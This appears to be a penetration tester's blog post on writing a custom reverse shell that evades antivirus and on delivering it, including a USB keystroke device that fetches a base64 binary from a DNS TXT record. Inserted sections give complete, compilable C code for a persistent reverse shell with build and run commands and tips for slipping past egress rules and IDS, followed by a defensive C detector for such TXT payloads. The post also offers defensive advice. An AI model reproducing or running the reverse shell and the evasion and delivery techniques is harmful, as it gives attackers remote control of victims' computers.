The idea behind

I couldn't take over my "computer" of interest while nobody was watching, so pentest -> FAIL!

This was the first thing on my mind. I started looking for a way to get a shell on the victim's computer and found out that there are a ton of reverse shells out in the wild. But when I started to test some "well git-documented" binaries, I couldn't pass any AV engine test.

  • So I started again from the beginning ...
  • Read the docs of the C++ libraries
  • Understand how socket connections work
  • Start programming your first app and connect it to netcat
  • or ...
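The step "connect your first app to netcat", as an added example in C (not the author's code and not the binary the post describes; the BSD socket calls are the same ones a C++ program would use). The listener address 127.0.0.1 and port 4443 are placeholder defaults borrowed from the post's own test setup, and an `ncat -lvp 4443` on the other end is assumed.

```c
/* Minimal reverse shell: connect back to a listener and hand it a shell.
 * Added example, not the original author's code. Listener assumed to be
 * `ncat -lvp 4443` on 127.0.0.1 (placeholder defaults, override on argv). */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Fill in an IPv4 socket address. Returns 0 on success, -1 if ip is not a dotted quad. */
int build_addr(struct sockaddr_in *sa, const char *ip, uint16_t port)
{
    memset(sa, 0, sizeof *sa);
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* Open a TCP connection to ip:port. Returns the connected fd, or -1 on any failure. */
int reverse_connect(const char *ip, uint16_t port)
{
    struct sockaddr_in sa;
    if (build_addr(&sa, ip, port) != 0)
        return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Point stdin/stdout/stderr at the socket and replace this process with a shell. */
static void attach_shell(int fd)
{
    dup2(fd, STDIN_FILENO);
    dup2(fd, STDOUT_FILENO);
    dup2(fd, STDERR_FILENO);
    close(fd);
    execl("/bin/sh", "sh", "-i", (char *)NULL);
    _exit(1);                       /* only reached if execl itself fails */
}

int main(int argc, char **argv)
{
    const char *ip = argc > 1 ? argv[1] : "127.0.0.1";
    uint16_t port = argc > 2 ? (uint16_t)atoi(argv[2]) : 4443;
    for (;;) {                      /* keep retrying so a listener that comes up later still gets a shell */
        int fd = reverse_connect(ip, port);
        if (fd >= 0)
            attach_shell(fd);
        sleep(5);
    }
}
```

Build with `cc -o revsh revsh.c` (file name assumed), start `ncat -lvp 4443`, then run `./revsh 127.0.0.1 4443`. Everything this does is in the clear: a fixed destination port, plaintext shell traffic and a fixed 5-second retry, which is exactly what an egress rule or an IDS signature keys on; the port and retry values are the first things to change when the target network is not wide open.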

Why not take a reverse shell, rewrite it and use it!

Never ever ...

Compiled code is bad! Why should a so-called WhiteHat on any forum give you software for free?

Because he wants "your" victim to be part of his botnet! So I took the simplest code I could find for a reverse shell, modified it and started to think about the more complicated tasks needed to fulfil my job.

< HOW TO GET MY REVSH > on the computer?

The easy way

Imagine that most companies allow all traffic out of the network and nothing in.

How stupid is that? How difficult is it to open only HTTP, HTTPS and DNS? So in my testing environment I just downloaded the binary and executed it as an unprivileged user. My reverse shell connected on port 4443 to my PenServer and the job was done.

The next step was locking down everything except HTTP, HTTPS and DNS traffic. This made my story more complicated, but the problem was solvable, because my ncat also listened on ports 80 and 443.

That's why I tell everybody to use an intrusion detection system [SNORT WILL BECOME YOUR BEST FRIEND]. But what if the "PenServer" is not outside but in the same network segment as your victim?

[YES] An activated client firewall would help a lot!

The hard way

Imagine ...

  • Intrusion detection is on
  • Client firewall is on
  • AV is well configured

Painful? No. A Rubber Ducky downloads the binary as a base64-encoded string from the TXT record of a DNS entry. It turned out that I have never seen a company that turned the USB ports off on any client. And it is very unlikely that companies break the SSL certificate on HTTPS to detect harmful traffic on port 443. So, as far as I can say, there is a chance to show your "BOSS" why security is not a task for an external, subcontracted and outsourced company.
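The TXT-record delivery above has a defensive counterpart worth showing, since DNS is the one channel the locked-down network still lets out. As an added example (not the author's tooling; the sample records are constructed, and the 200-character "opaque blob" threshold is an arbitrary assumption to tune against real zone data), the C below treats a TXT string the way a resolver-log check would: it ignores anything with key=value syntax or spaces (SPF, DKIM, site-verification records), base64-decodes the rest, and flags a string whose first bytes are an ELF, PE or Mach-O header, or that is a long opaque base64 blob with no recognisable record syntax.

```c
/* Defender-side check for the DNS TXT delivery trick described above.
 * Added example, not the author's tooling; sample records are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode base64 text into out, writing at most outcap bytes.
 * Returns the number of bytes written, or -1 if a character outside the
 * base64 alphabet appears or '=' padding shows up anywhere but at the end. */
int b64_decode(const char *in, uint8_t *out, size_t outcap)
{
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    uint32_t acc = 0;
    int bits = 0;
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        if (*p == '=') {                          /* padding: only '=' may follow */
            for (; *p; p++)
                if (*p != '=')
                    return -1;
            break;
        }
        const char *q = strchr(tbl, *p);
        if (q == NULL)
            return -1;
        acc = (acc << 6) | (uint32_t)(q - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n < outcap)
                out[n] = (uint8_t)((acc >> bits) & 0xff);
            n++;
        }
    }
    return (int)(n < outcap ? n : outcap);
}

/* Magic bytes a base64-carried "download" decodes to. */
int looks_like_executable(const uint8_t *b, size_t n)
{
    if (n >= 4 && b[0] == 0x7f && b[1] == 'E' && b[2] == 'L' && b[3] == 'F')
        return 1;                                 /* ELF */
    if (n >= 2 && b[0] == 'M' && b[1] == 'Z')
        return 1;                                 /* PE (DOS stub) */
    if (n >= 4 && b[0] == 0xcf && b[1] == 0xfa && b[2] == 0xed && b[3] == 0xfe)
        return 1;                                 /* Mach-O 64-bit, little-endian */
    return 0;
}

#define OPAQUE_THRESHOLD 200   /* assumption for the example; tune against your own zone data */

/* Classify one TXT string:
 *   0 = looks like an ordinary record
 *   1 = base64 that decodes to an executable header
 *   2 = long opaque base64 with no record syntax (a later chunk, or something else worth a look) */
int classify_txt(const char *txt)
{
    size_t len = strlen(txt);
    const char *eq = strchr(txt, '=');
    /* Spaces or an interior '=' mean key=value syntax: SPF, DKIM, site verification. */
    if (strchr(txt, ' ') != NULL || (eq != NULL && (size_t)(eq - txt) + 2 < len))
        return 0;
    uint8_t head[8];
    int n = b64_decode(txt, head, sizeof head);
    if (n < 0)
        return 0;                                 /* not base64 at all */
    if (looks_like_executable(head, (size_t)n))
        return 1;
    return len >= OPAQUE_THRESHOLD ? 2 : 0;
}

/* Constructed sample records (not captured traffic). */
const char *const SAMPLE_SPF  = "v=spf1 include:_spf.example.com -all";
const char *const SAMPLE_DKIM = "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC";
const char *const SAMPLE_ELF  = "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA";   /* base64 of an ELF64 header */
const char *const SAMPLE_PE   = "TVqQAAMAAAAEAAAA//8AALgAAAAA";       /* base64 of an MZ header */

int main(void)
{
    const char *samples[] = { SAMPLE_SPF, SAMPLE_DKIM, SAMPLE_ELF, SAMPLE_PE };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%d  %.40s\n", classify_txt(samples[i]), samples[i]);
    return 0;
}
```

Run it over the TXT answers your resolver logs: a 1 is the first chunk of the download, the 2s are the rest (each string in a TXT record is at most 255 bytes, so a binary arrives as many records, and the volume of TXT queries from one client is itself a signal). Two caveats: a DKIM p= key is long base64 too, which is why the key=value test runs first, and the magic-byte check is trivially dodged by XOR-ing or encrypting the blob before encoding, so treat the length rule and the query volume as the durable part and the signature as a bonus.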